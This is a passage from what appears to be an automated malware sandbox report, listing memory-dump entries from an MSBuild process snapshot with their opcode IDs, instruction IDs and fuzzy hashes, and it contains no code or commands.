                                                                                      • Opcode Fuzzy Hash: fe6817ad0ab7a0e175741e2238a12764bc5596ce477fe0127d7b2bda2a5d4b75
                                                                                      • Instruction Fuzzy Hash: BD1112B1C00659DFDB14CF9AC544BDEFBF4EB48220F14812AD818A7240D378A944CFA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2480680926.0000000002D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D1D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_2d1d000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e00325040d7049acca68c6cccd0ab4294e5d86bf90c7121f766216b714fbd285
                                                                                      • Instruction ID: caccb88c6624def6f06bb6941967e21e24641d9fdf0eea8e5ce42b4b5089ef81
                                                                                      • Opcode Fuzzy Hash: e00325040d7049acca68c6cccd0ab4294e5d86bf90c7121f766216b714fbd285
                                                                                      • Instruction Fuzzy Hash: 27314D7550E3C09FD703CB24D990755BF71AB47214F2985DBD8898F6A3C33A984ACB62
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2480680926.0000000002D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D1D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_2d1d000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7317488183edebb75a09a307242924552475ad70aa65227e4477f49a45f40b2a
                                                                                      • Instruction ID: 3994baba13840f246125635f0a56eaf06d73e18ebe71e29b96fcdb77b57fb3fc
                                                                                      • Opcode Fuzzy Hash: 7317488183edebb75a09a307242924552475ad70aa65227e4477f49a45f40b2a
                                                                                      • Instruction Fuzzy Hash: 4A21D3B1504204EFDB14DF24E9C4B26BB66FB84314F30C56DE8494B792C736D846CA62